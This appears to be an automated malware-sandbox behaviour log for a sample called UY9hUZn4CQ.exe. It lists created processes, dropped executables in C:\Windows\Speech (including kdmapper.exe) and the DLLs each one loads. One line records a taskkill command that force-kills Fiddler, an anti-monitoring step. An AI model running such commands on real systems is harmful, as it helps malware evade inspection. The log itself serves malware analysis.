                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: msvcp140.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: msvcp140.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: dxgi.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                Source: C:\Windows\Speech\imxyvi.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: version.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dxgidebug.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sfc_os.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dwmapi.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: riched20.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: usp10.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msls31.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windowscodecs.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textshaping.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textinputframework.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coreuicomponents.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wldp.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: propsys.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: profapi.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: edputil.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: urlmon.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: iertutil.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: srvcli.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: netutils.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: policymanager.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msvcp110_win.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: appresolver.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: bcp47langs.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: slc.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: userenv.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sppc.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: pcacli.dll
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
